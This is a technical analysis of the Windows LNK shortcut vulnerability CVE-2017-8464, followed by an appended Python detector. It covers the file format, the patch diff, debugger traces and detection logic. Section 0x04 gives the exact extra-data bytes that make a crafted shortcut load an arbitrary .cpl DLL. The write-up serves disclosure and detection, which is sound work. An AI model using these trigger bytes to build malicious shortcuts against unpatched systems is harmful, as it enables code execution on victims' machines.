/---------------------------------------------------------------------------------------\
|>....[ ITW 0day: A brief analysis of the LNK remote code execution vulnerability (CVE-2017-8464) ]....<|
|>......................[ by nEINEI/vxjump.net ]......................<|
|>..........................[ 2017-06-28 ].........................<|
\>..........................[ neineit@gmail.com ].........................</

Layout of an LNK file:

    +---------------------------+
    | Shell Item Id List        |
    +---------------------------+
    | File location info        |
    +---------------------------+
    | Description string        |
    +---------------------------+
    | Relative path string      |     Not every one of these sections has to be present; those that
    +---------------------------+     are present must appear in this order.
    | Working directory string  |
    +---------------------------+
    | Command line string       |
    +---------------------------+
    | Icon filename string      |
    +---------------------------+
    | Extra stuff               |
    +---------------------------+

The parts relevant to this vulnerability are 1) the Shell Item Id List and 2) Extra stuff.
For a more detailed introduction to the LNK file format, see the article published earlier on Vxjump; it is not repeated here:
http://www.vxjump.net/files/security_research/lnk_inf.txt

Some security companies have said that this vulnerability closely resembles CVE-2010-2568, which Stuxnet exploited. There is some truth to that: both involve loading a CPL through a Control Panel shortcut, but there are also real differences.

The main factor is still the Shell Item Id List, the part that describes the shortcut's path.
For example, if I have a file c:\a\b\c\x.jpg and create a shortcut to it, the following shell Item ID list structure is produced:

    Offset    0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F
    00000040                                      4B 01 14 00
    00000050  1F 50 E0 4F D0 20 EA 3A 69 10 A2 D8 08 00 2B 30
    00000060  30 9D 19 00 2F 43 3A 5C 00 00 00 00 00 00 00 00
    00000070  00 00 00 00 00 00 00 00 00 00 00 44 00 31 00 00
    00000080  00 00 00 E7 4A 01 73 10 00 61 00 34 00 09 00 04
    00000090  00 EF BE E7 4A 01 73 E7 4A 01 73 2E 00 00 00 7A
    000000A0  65 01 00 00 00 4F 02 00 00 00 00 00 00 00 00 00
    000000B0  00 00 00 00 00 DB B6 E5 00 61 00 00 00 10 00 44
    000000C0  00 31 00 00 00 00 00 E7 4A 01 73 10 00 62 00 34
    000000D0  00 09 00 04 00 EF BE E7 4A 01 73 E7 4A 01 73 2E
    000000E0  00 00 00 D3 65 01 00 00 00 20 01 00 00 00 00 00
    000000F0  00 00 00 00 00 00 00 00 00 69 96 E5 00 62 00 00
    00000100  00 10 00 44 00 31 00 00 00 00 00 E7 4A C3 73 10
    00000110  00 63 00 34 00 09 00 04 00 EF BE E7 4A 01 73 E7
    00000120  4A C3 73 2E 00 00 00 E9 65 01 00 00 00 1F 00 00
    00000130  00 00 00 00 00 00 00 00 00 00 00 00 00 EC BF 2D
    00000140  01 63 00 00 00 10 00 50 00 32 00 AE 3D 04 00 9F
    00000150  2F 00 80 20 00 78 2E 4A 50 47 00 3C 00 09 00 04
    00000160  00 EF BE E7 4A C1 73 E7 4A C1 73 2E 00 00 00 F2
    00000170  65 01 00 00 00 64 00 00 00 00 00 00 00 00 00 00
    00000180  00 00 00 00 00 00 00 00 00

This part can be represented as a structure:

    struct ShellItem{
        DWORD size;
        SHITEMID item[1];        // a variable-length section: it grows as directory levels are added
    }

    typedef struct _SHITEMID {
        unsigned short int cb;   // length of this item
        unsigned char abID[0];   // variable-length data
    }SHITEMID,*LPSHITEMID;

Usually SHITEMID[0] stands for My Computer:

    \x14\x00                                                          (length)
    \x1F                                                              (type)
    \x50                                                              (unknown)
    \xE0\x4F\xD0\x20\xEA\x3A\x69\x10\xA2\xD8\x08\x00\x2B\x30\x30\x9D  (GUID)

Converted, the GUID above is HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}; you can look it up on your own machine.
A shortcut's top-level directory starts here by default; walking this structure in order, you can find the SHITEMID[1], SHITEMID[2], SHITEMID[3] and SHITEMID[4] entries that correspond to \a, \b, \c and x.jpg.

A Control Panel shortcut is different:

    SHITEMID[0] - the My Computer entry
    SHITEMID[1] - the Control Panel GUID entry, usually \x19\x00\x2F\x43\x3A\x5C\x00\x00\x00\x00\x00\x00
    SHITEMID[2] - the specific Control Panel cpl applet; a standard Control Panel shortcut places its own path information in the Extra stuff structure.

For example, create a shortcut to AutoPlay from the Control Panel and look at the Extra data: you can see a GUID, and looking it up tells you which cpl applet it corresponds to.

    Auto Play:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{9C60DE1E-E5FC-40f4-A487-460851A8D915}

From the earlier analysis of CVE-2010-2568, that exploit's SHITEMID[1] is filled with the Control Panel GUID {21EC2020-3AEA-1069-A2DD-08002B30309D}, and SHITEMID[2] adds the path of the corresponding cpl program.
According to the analysis of CVE-2017-8464, merely adding the cpl program's path does not trigger the vulnerability; a special Extra data block has to be constructed as well.

[0x03]. Patch comparison

Analysis platform: win7 x86
File: shell32.dll (before the patch: 6.1.7601.1892, after the patch: 6.1.7601.23806)

The patch diff shows that Microsoft fixed a lot of places this time. Based on the previous experience, the natural thing is to look at where the CPL_LoadCPLModule function is called:
    ...
    CAutoComplete::_OnSearchComplete(SearchResults *,_DPA *)                                                   738F086E  CAutoComplete::_OnSearchComplete(SearchResults *,_DPA *)
    kfapi::CFolderRedirector::Redirect(_GUID const &,HWND__ *,ulong,ushort const *,_GUID const *,uint,ushort * *)  73B61419  kfapi::CFolderRedirector::Redirect(_GUID const &,HWND__ *,ulong,ushort const *,_GUID const *,uint,ushort * *)
    CopyStreamToFile(IStream *,ushort const *,unsigned __int64)                                                73B16E33  CopyStreamToFile(IStream *,ushort const *,unsigned __int64)
    CControlPanelFolder::_GetPidlFromAppletId(ushort const *,_ITEMID_CHILD * *)                                73AF300B  CControlPanelFolder::_GetPidlFromAppletId(ushort const *,_ITEMID_CHILD * *)
    CAutoComplete::_AppendNext(int)                                                                            73AA4538  CAutoComplete::_AppendNext(int)
    CAutoComplete::_AppendPrevious(int)                                                                        73AA460E  CAutoComplete::_AppendPrevious(int)
    CGrep::_InitializeChunkBuffer(void)                                                                        73B9066F  CGrep::_InitializeChunkBuffer(void)
    ...

Among these, the fix in CControlPanelFolder::_GetPidlFromAppletId(ushort const *,_ITEMID_CHILD * *) is related to the CPL_LoadCPLModule function. The key point is here:

    if ( SHExpandEnvironmentStringsW(&Start, &v17, 260) )
    {
      if ( CControlPanelFolder::_IsRegisteredCPLApplet(v11, &v17) )   // --- a check was added here
      {
        v12 = 0;
        v7 = CPL_LoadCPLModule(&v17, 0);
        if ( v7 )
        {
          v13 = 0;
          do
          {
            v8 = (struct _DSA *)*((_DWORD *)v7 + 135);
            if ( v6 >= *(_DWORD *)v8 )
              break;
            v9 = DSA_GetItemPtr(v8, v6);
            if ( v9 )
            {
              v12 = IDControlCreate(
              ...
    }

At this point we know that the key is the path by which this vulnerability is triggered to call CPL_LoadCPLModule: if there were no problem at this spot, Microsoft would not be filtering with _IsRegisteredCPLApplet, since CVE-2010-2568 was also patched with this mechanism.

[0x04]. Vulnerability analysis

Tracing back, we get one trigger path:

    CControlPanelFolder::ParseDisplayName   (in IDA no concrete references to CControlPanelFolder::ParseDisplayName can be seen)
      --> CControlPanelFolder::_GetPidlFromAppletId
        --> CPL_LoadCPLModule

So the call to CControlPanelFolder::ParseDisplayName must be made dynamically, through an object's virtual function table.

With a breakpoint set on CControlPanelFolder::ParseDisplayName, opening arbitrary directories that contain .lnk files rarely triggers it. This shows that ordinary lnk files are missing some information, or have the relevant fields wrong.
Testing with a CVE-2010-2568 sample does not hit this breakpoint either. But when I printed the execution path I saw some things worth noting: following the earlier vulnerability's call chain, _DecodeSpecialFolder is executed, but this function does not actually run to completion.

       46   101 [  2]     SHLWAPI!SHReadDataBlockList
        3     0 [  3]       SHLWAPI!__security_check_cookie eax = 0
       48   104 [  2]     SHLWAPI!SHReadDataBlockList eax = 0
      119  3446 [  1]   SHELL32!CShellLink::_LoadFromStream
       16     0 [  2]     SHELL32!CShellLink::_DecodeSpecialFolder
       11     0 [  3]       SHLWAPI!SHFindDataBlock eax = 0
       22    11 [  2]     SHELL32!CShellLink::_DecodeSpecialFolder
       11     0 [  3]       SHLWAPI!SHFindDataBlock eax = 0
       27    22 [  2]     SHELL32!CShellLink::_DecodeSpecialFolder
        5     0 [  3]       SHELL32!SHFree
        8     0 [  3]       ole32!CoTaskMemFree
        7     0 [  4]         ole32!CRetailMalloc_Free eax = 76b076bc
       10     7 [  3]       ole32!CoTaskMemFree eax = 76b076bc
       33    44 [  2]     SHELL32!CShellLink::_DecodeSpecialFolder
        3     0 [  3]       SHELL32!__security_check_cookie eax = 76b076bc

    void __thiscall CShellLink::_DecodeSpecialFolder(CShellLink *this)
    {
      CShellLink *v1; // esi@1
      int v2; // eax@1
      int v3; // edi@1
      signed int v4; // eax@3
      signed int v5; // eax@5
      int v6; // ecx@5
      char *v7; // edi@7
      unsigned int v8; // ebx@7
      int i; // eax@7
      bool v10; // zf@9
      const ITEMIDLIST *v11; // eax@13
      ITEMIDLIST *v12; // ebx@14
      ITEMIDLIST *v13; // edi@15
      int v14; // eax@15
      int v15; // esi@15
      int v16; // eax@15
      int v17; // eax@20
      int v18; // edi@20
      const struct _ITEMIDLIST_RELATIVE *pidl; // [sp+Ch] [bp-Ch]@7
      ITEMIDLIST *pidla; // [sp+Ch] [bp-Ch]@13
      LPITEMIDLIST v21; // [sp+10h] [bp-8h]@1

      v21 = 0;
      v1 = this;
      v2 = SHFindDataBlock(*((_DWORD *)this + 57), 0xA000000B);
      v3 = v2;
      if ( v2 )   // if the lookup succeeds, continue; otherwise release with ILFree(pidla);
      {
        if ( !CShellLink::_ShouldDecodeSpecialFolder(v1, (const struct _GUID *)(v2 + 8)) )
          goto LABEL_19;
        v4 = 0x4000;
        if ( *((_DWORD *)v1 + 65) & 0x400000 )
          v4 = 20480;
        v5 = SHGetKnownFolderIDList(v3 + 8, v4, 0, &v21);
        v6 = *(_DWORD *)(v3 + 24);
      }
      else
      {
        v17 = SHFindDataBlock(*((_DWORD *)v1 + 57), 0xA0000005);
        v18 = v17;
        if ( !v17 )
          goto LABEL_19;
        v21 = SHCloneSpecialIDList(0, *(_DWORD *)(v17 + 8), 0);
        v6 = *(_DWORD *)(v18 + 12);
        v5 = v21 != 0 ? 0 : -2147024882;
      }

Obviously SHFindDataBlock fails, because the DataBlock it searches for is missing. The LNK file manual describes the Extra Data structure, which involves many blocks and their signatures; the parameters in the calls above are exactly those signatures, 0xA0000005 and 0xA000000B:

    ConsoleDataBlock              - 0xA0000002
    ConsoleFEDataBlock            - 0xA0000004
    EnvironmentVariableDataBlock  - 0xA0000001
    IconEnvironmentDataBlock      - 0xA0000007
    PropertyStoreDataBlock        - 0xA0000009
    SpecialFolderDataBlock        - 0xA0000005   (the parameter mentioned in the function above)
    KnownFolderDataBlock          - 0xA000000B   (the parameter mentioned in the function above)

So, on top of a CVE-2010-2568 sample, one can add an ExtraData section, trying a SpecialFolderDataBlock and a KnownFolderDataBlock in turn.
The specific format:

    struct KnownFolderDataBlock{
        DWORD BlockSize;
        DWORD BlockSignature;
        CHAR  GUID[16];
        DWORD offset;
    }

    KnownFolderDataBlock:
    \x1C\x00\x00\x00\x0B\x00\x00\xA0\x19\x27\x6D\x74\x59\x74\x6A\x2D\x63\x1A\x9D\x7f\x63\x24\x8C\x6D\x00\x00\x00\x03

Which special folder ID the GUID in the middle should point to does not seem to be explained clearly in the documentation; I could only construct some existing GUIDs and test repeatedly, without success (if anyone has had a successful test, please let me know).

The SpecialFolderDataBlock structure is comparatively simpler:

    struct SpecialFolderDataBlock{
        DWORD BlockSize;
        DWORD BlockSignature;
        DWORD ID;
        DWORD offset;
    }

Add these bytes:

    \x10\x00\x00\x00\x05\x00\x00\xA0\x03\x00\x00\x00\x28\x00\x00\x00\x00\x00

Note the 0x28 here; according to the manual it is the offset:

    A 32-bit, unsigned integer that specifies the location of the ItemID of the first child segment of the IDList specified by SpecialFolderID. This value is the offset, in bytes, into the link target IDList.

What I computed here is the difference between SHITEMID[2] and SHITEMID[0].
With this, you can see the call stack of the .lnk file being loaded.

    Offset    0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F
    00000080  00 00 00 6A 00 00 00 00 00 00 05 01 05 01 46 00   j F
    00000090  3A 00 5C 00 2E 00 5C 00 2E 00 5C 00 2E 00 5C 00   : \ . \ . \ . \
    000000A0  2E 00 5C 00 2E 00 74 00 65 00 73 00 74 00 2E 00   . \ . t e s t .
    000000B0  63 00 70 00 6C 00 00 00                           c p l

The final load: SHExpandEnvironmentStringsW obtains the system directory and concatenates the directory that follows onto it to form a system path.

    SHELL32!CControlPanelFolder::_GetPidlFromAppletId+0x160:
    75ec3da3 50              push    eax
    0:017> db eax
    0583cde4  43 00 3a 00 5c 00 57 00-69 00 6e 00 64 00 6f 00  C.:.\.W.i.n.d.o.
    0583cdf4  77 00 73 00 5c 00 73 00-79 00 73 00 74 00 65 00  w.s.\.s.y.s.t.e.
    0583ce04  6d 00 33 00 32 00 5c 00-2e 00 74 00 65 00 73 00  m.3.2.\...t.e.s.
    0583ce14  74 00 2e 00 63 00 70 00-6c 00 2c 00 00 00 15 09  t...c.p.l.,.....
    0583ce24  38 ce 83 05 18 6f a0 76-d8 ed 15 09 70 f4 c6 75  8....o.v....p..u
    0583ce34  53 00 6f 00 66 00 74 00-77 00 61 00 72 00 65 00  S.o.f.t.w.a.r.e.
    0583ce44  5c 00 4d 00 69 00 63 00-72 00 6f 00 73 00 6f 00  \.M.i.c.r.o.s.o.
    0583ce54  66 00 74 00 5c 00 57 00-69 00 6e 00 64 00 6f 00  f.t.\.W.i.n.d.o.
    0:013> kv
    ChildEBP RetAddr  Args to Child
    0499d114 75ec3f52 08ec3a48 0499d21c 75c70180 SHELL32!CControlPanelFolder::_GetPidlFromAppletId+0x181 (FPO: [Non-Fpo])
    0499d140 75c5799b 08cabc38 00000000 08d5a800 SHELL32!CControlPanelFolder::ParseDisplayName+0x49 (FPO: [Non-Fpo])
    0499d1c4 75c5f0af 090ddaac 00000000 08d5a800 SHELL32!CRegFolder::ParseDisplayName+0x93 (FPO: [Non-Fpo])
    0499d238 75c606cd 090de3dc 00347098 75c7a660 SHELL32!ReparseRelativeIDList+0x137 (FPO: [Non-Fpo])
    0499d27c 75c60715 00000000 00347070 08ead300 SHELL32!TranslateAliasWithEvent+0xa6 (FPO: [Non-Fpo])
    0499d294 75c2e84e 00347070 08ead300 05c06258 SHELL32!TranslateAlias+0x15 (FPO: [Non-Fpo])
    0499d2c0 75c2e5e3 00000000 00000000 05d5e0c8 SHELL32!CShellLink::_DecodeSpecialFolder+0xf9 (FPO: [Non-Fpo])
    0499e584 75beca18 08f4c6d8 00000000 00000000 SHELL32!CShellLink::_LoadFromStream+0x39f (FPO: [Non-Fpo])
    0499e7b4 75bec987 0499e840 00000000 0499e7f0 SHELL32!CShellLink::_LoadFromFile+0x90 (FPO: [Non-Fpo])
    0499e7c4 75bec8dc 05d5e0dc 0499e840 00000000 SHELL32!CShellLink::Load+0x32 (FPO: [Non-Fpo])
    0499e7f0 75bec933 05d5e0d0 0499e840 00000000 SHELL32!InitializeFileHandlerWithFile+0x6a (FPO: [Non-Fpo])
    0499ea4c 75c38be0 00000000 0499eaa0 00000002 SHELL32!CFileSysItemString::HandlerCreateInstance+0x168 (FPO: [Non-Fpo])
    0499eb04 75c42626 00000000 00000000 00000000 SHELL32!CFileSysItemString::LoadHandler+0x16b (FPO: [Non-Fpo])
    0499efb4 75c42674 00000000 00000001 0499f00c SHELL32!CFSFolder::_BindHandler+0x1d1 (FPO: [Non-Fpo])
    0499efd4 75bf9aa6 09058198 00000000 00000001 SHELL32!CFSFolder::GetUIObjectOf+0x21 (FPO: [Non-Fpo])
    0499f490 75c3128d 09058180 05b4c0b8 05b4c0b8 SHELL32!CFSFolder::_GetPerceivedType+0x60 (FPO: [Non-Fpo])
    0499f4b0 75c371fd 00000000 05b4c0b8 05b4c0b8 SHELL32!CFSFolder::_GetInnateDetailsFromHelper+0x47 (FPO: [Non-Fpo])
    0499f4e0 75c31398 00000000 05b4c0b8 75c632ac SHELL32!CFSFolder::_GetInnateDetailsWithHandlerExceptions+0x61 (FPO: [Non-Fpo])
    0499f4fc 75c3134c 05b4c0b8 75c632ac 0499f578 SHELL32!CFSFolder::_GetInnateDetails+0x18 (FPO: [Non-Fpo])
    0499f538 75c312e9 05b4c0b8 75c632ac 0499f578 SHELL32!CFSFolder::_GetInnateDetailsAsVariant+0x41 (FPO: [Non-Fpo])
    0499f580 75c0e197 09058198 05b4c0b8 75c632ac SHELL32!CFSFolder::GetDetailsEx+0x40 (FPO: [Non-Fpo])
    0499f5b0 75c0ed8d 09058198 05b4c0b8 09056584 SHELL32!GetPerceivedType+0x44 (FPO: [Non-Fpo])
    0499f5f8 75c0dc3a 0499f61c 08d6d4e0 09056584 SHELL32!GetFolderTypeFromItems+0xd8 (FPO: [Non-Fpo])
    0499f63c 75c0d99c 08d6d4e0 09056584 09058198 SHELL32!CEnumTask::_CalculateFolderType+0x2f (FPO: [Non-Fpo])
    0499f698 75c09e63 09058198 0499f6f0 0499f6ec SHELL32!CEnumTask::_IncrFillEnumToView+0x192 (FPO: [Non-Fpo])
    0499f6f8 75c09fcd 09058198 00000001 755f81eb SHELL32!CEnumTask::_IncrEnumFolder+0x2b5 (FPO: [Non-Fpo])
    0499f73c 75c38226 09056550 01000000 80000000 SHELL32!CEnumTask::InternalResumeRT+0x325 (FPO: [Non-Fpo])
    0499f75c 75c761fb 09056564 7fffffff 05cb7708 SHELL32!CRunnableTask::Run+0xce (FPO: [Non-Fpo])
    0499f778 75c78a8b 0499f7b4 00000000 090b62d8 SHELL32!CShellTask::TT_Run+0x167 (FPO: [Non-Fpo])
    0499f7c0 75c78bbf 0499f7d8 7753b2b1 05cb7708 SHELL32!CShellTaskThread::ThreadProc+0xa3 (FPO: [Non-Fpo])
    0499f7c8 7753b2b1 05cb7708 03de89a8 0499f84c SHELL32!CShellTaskThread::s_ThreadProc+0x1b (FPO: [Non-Fpo])
    0499f7d8 773dd7c4 090b62d8 7322bf39 03de89a8 SHLWAPI!ExecuteWorkItemThreadProc+0xe (FPO: [Non-Fpo])

Microsoft's fix is a check in _IsRegisteredCPLApplet: whether the DLL path passed in for loading matches one of the .cpl paths that exist by default. If the input path is not in the whitelist, it returns false and no DLL is loaded.

The patched function has to decide whether the path exists in a list. It first fetches the first element, then compares them in turn:

    76f136bb ff30            push    dword ptr [eax]      ds:0023:067f1170=038bf1a0
    0:002> db 038bf1a0
    038bf1a0  43 00 3a 00 5c 00 50 00-52 00 4f 00 47 00 52 00  C.:.\.P.R.O.G.R.
    038bf1b0  41 00 7e 00 31 00 5c 00-4d 00 49 00 46 00 35 00  A.~.1.\.M.I.F.5.
    038bf1c0  42 00 41 00 7e 00 31 00-5c 00 4f 00 66 00 66 00  B.A.~.1.\.O.f.f.
    038bf1d0  69 00 63 00 65 00 31 00-34 00 5c 00 4d 00 4c 00  i.c.e.1.4.\.M.L.
    038bf1e0  43 00 46 00 47 00 33 00-32 00 2e 00 43 00 50 00  C.F.G.3.2...C.P.
    038bf1f0  4c 00 00 00 00 00 05 10-66 a6 ec 53 ff ff 00 8c  L.......f..S....
    038bf200  57 00 69 00 6e 00 64 00-6f 00 77 00 73 00 20 00  W.i.n.d.o.w.s. .
    038bf210  77 00 69 00 6c 00 6c 00-20 00 69 00 6e 00 73 00  w.i.l.l. .i.n.s.

Second iteration:

    0:002> db 0692e7d0
    0692e7d0  43 00 3a 00 5c 00 57 00-69 00 6e 00 64 00 6f 00  C.:.\.W.i.n.d.o.
    0692e7e0  77 00 73 00 5c 00 73 00-79 00 73 00 74 00 65 00  w.s.\.s.y.s.t.e.
    0692e7f0  6d 00 33 00 32 00 5c 00-77 00 73 00 63 00 75 00  m.3.2.\.w.s.c.u.
    0692e800  69 00 2e 00 63 00 70 00-6c 00 00 00 6c 00 00 00  i...c.p.l...l...
    0692e810  33 f7 4b 53 01 00 00 80-14 00 4c 00 45 00 33 00  3.KS......L.E.3.
    0692e820  43 00 42 00 46 00 39 00-32 00 41 00 33 00 34 00  C.B.F.9.2.A.3.4.
    0692e830  36 00 46 00 33 00 34 00-30 00 42 00 31 00 39 00  6.F.3.4.0.B.1.9.
    0692e840  31 00 35 00 38 00 43 00-32 00 35 00 42 00 43 00  1.5.8.C.2.5.B.C.

Third:

    0:002> db poi(eax)
    0384a9c0  43 00 3a 00 5c 00 57 00-69 00 6e 00 64 00 6f 00  C.:.\.W.i.n.d.o.
    0384a9d0  77 00 73 00 5c 00 73 00-79 00 73 00 74 00 65 00  w.s.\.s.y.s.t.e.
    0384a9e0  6d 00 33 00 32 00 5c 00-46 00 6c 00 61 00 73 00  m.3.2.\.F.l.a.s.
    0384a9f0  68 00 50 00 6c 00 61 00-79 00 65 00 72 00 43 00  h.P.l.a.y.e.r.C.
    0384aa00  50 00 4c 00 41 00 70 00-70 00 2e 00 63 00 70 00  P.L.A.p.p...c.p.
    0384aa10  6c 00 00 00 00 00 6e 00-ea 57 13 53 73 00 00 80  l.....n..W.Ss...
    0384aa20  32 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  2...............
    0384aa30  01 00 00 00 00 00 00 00-a0 71 60 06 e8 95 a5 76  .........q`....v

So even when a load of the path is attempted, it is refused because the path is not in the whitelist.

[0x05]. About detection

To detect this vulnerability generically, the detection has to target the non-standard format of the shell item id list:

    SHITEMID[0] = \x1F\x50\xE0\x4F\xD0\x20\xEA\x3A\x69\x10\xA2\xD8\x08\x00\x2B\x30\x9D
    SHITEMID[1] = \x2E\x1E\x20\x20\xEC\x21\xEA\x3A\x69\x10\xA2\xDD\x08\x00\x2B\x30\x30\x9D

In addition, for the ExtraData:

    ExtraData.BlockSize      = 0x00000010
    ExtraData.BlockSignature = 0xA0000005

The detection logic is as follows:

    if (SHITEMID[0] == "\x1f\x50 ..." && SHITEMID[1] == "\x2e\x1e ...")
    {
        if (SHITEMID[2] contains ".\\" || SHITEMID[2] contains ".dll")
        {
            if (ExtraData.BlockSize == 0x00000010 && ExtraData.BlockSignature == 0xA0000005)
            {
                alert("Found CVE-2017-8464 Vulnerability\n");
            }
        }
    }

[0x06]. Other

Given my limited understanding of KnownFolderDataBlock and the lack of a deeper analysis of the related calls, I cannot say for certain whether KnownFolderDataBlock is also necessarily linked to this vulnerability. But Microsoft's fix for this vulnerability is clearly whitelist-based filtering, so even if a KnownFolderDataBlock could also be used to trigger it, the load would still not succeed.

[References]
[MS-SHLLINK]-160714.pdf
https://msdn.microsoft.com/en-us/library/dd891343.aspx
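The detection logic from section [0x05], written out as a working parser instead of pseudocode. This is an added example, not code from the original article: it walks a .lnk's LinkTargetIDList, skips LinkInfo and StringData, reads the ExtraData blocks per [MS-SHLLINK], and applies the three conditions above. The My Computer item bytes and the Control Panel CLSID are taken from the article, the header offsets and flag bits from the specification; build_lnk only assembles a minimal test fixture and is not the layout of a real sample.

```python
import struct

# Constants from the article: the My Computer item bytes, the Control Panel CLSID
# {21EC2020-3AEA-1069-A2DD-08002B30309D} as a little-endian GUID, and the
# SpecialFolderDataBlock signature. Header offsets and flag bits follow [MS-SHLLINK].
MY_COMPUTER_ITEM = bytes.fromhex("1F50E04FD020EA3A6910A2D808002B30309D")
CONTROL_PANEL_CLSID = bytes.fromhex("2020EC21EA3A6910A2DD08002B30309D")
SPECIAL_FOLDER_SIG = 0xA0000005
HEADER_SIZE, HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x4C, 0x01, 0x02, 0x80
STRING_FLAGS = (0x04, 0x08, 0x10, 0x20, 0x40)  # Name, RelativePath, WorkingDir, Arguments, IconLocation

def parse_lnk(data):
    """Return (idlist_items, extra_blocks); each item is its abID bytes with cb stripped."""
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos, items, blocks = HEADER_SIZE, [], []
    if flags & HAS_IDLIST:
        end = pos + 2 + struct.unpack_from("<H", data, pos)[0]  # IDListSize, then the items
        pos += 2
        while pos + 2 <= end and (cb := struct.unpack_from("<H", data, pos)[0]) >= 2:
            items.append(data[pos + 2:pos + cb])  # cb < 2 is the TerminalID
            pos += cb
        pos = end
    if flags & HAS_LINKINFO:  # LinkInfo begins with its own total size
        pos += struct.unpack_from("<I", data, pos)[0]
    for f in STRING_FLAGS:  # each StringData entry: CountCharacters, then the characters
        if flags & f:
            n = struct.unpack_from("<H", data, pos)[0]
            pos += 2 + n * (2 if flags & IS_UNICODE else 1)
    while pos + 4 <= len(data):  # ExtraData: BlockSize, BlockSignature, body
        bsize = struct.unpack_from("<I", data, pos)[0]
        if bsize < 8 or pos + bsize > len(data):  # TerminalBlock (< 4) or truncated file
            break
        sig = struct.unpack_from("<I", data, pos + 4)[0]
        blocks.append((bsize, sig, data[pos + 8:pos + bsize]))
        pos += bsize
    return items, blocks

def matches_cve_2017_8464_shape(data):
    """The article's three conditions: odd item list, relative/.dll target, 0x10-byte 0xA0000005 block."""
    items, blocks = parse_lnk(data)
    if len(items) < 3 or items[0] != MY_COMPUTER_ITEM or CONTROL_PANEL_CLSID not in items[1]:
        return False
    target = items[2].lower()  # UTF-16LE path; search raw bytes so any prefix bytes do not matter
    if ".\\".encode("utf-16-le") not in target and ".dll".encode("utf-16-le") not in target:
        return False
    return any(size == 0x10 and sig == SPECIAL_FOLDER_SIG for size, sig, _ in blocks)

def build_lnk(items, extra_blocks):
    """Constructed minimal .lnk (header + IDList + ExtraData) used only to exercise the check."""
    header = bytearray(HEADER_SIZE)
    link_clsid = bytes.fromhex("0114020000000000C000000000000046")  # {00021401-0000-0000-C000-000000000046}
    struct.pack_into("<I16sI", header, 0, HEADER_SIZE, link_clsid, HAS_IDLIST)  # HeaderSize, LinkCLSID, LinkFlags
    idlist = b"".join(struct.pack("<H", len(i) + 2) + i for i in items) + b"\x00\x00"
    extra = b"".join(struct.pack("<II", len(b) + 8, sig) + b for sig, b in extra_blocks)
    return bytes(header) + struct.pack("<H", len(idlist)) + idlist + extra + b"\x00" * 4
```

The SHITEMID[2] test searches the UTF-16LE bytes directly, so the non-text bytes that precede the path in the item (visible in the dump at offset 0x80 above) do not affect the match.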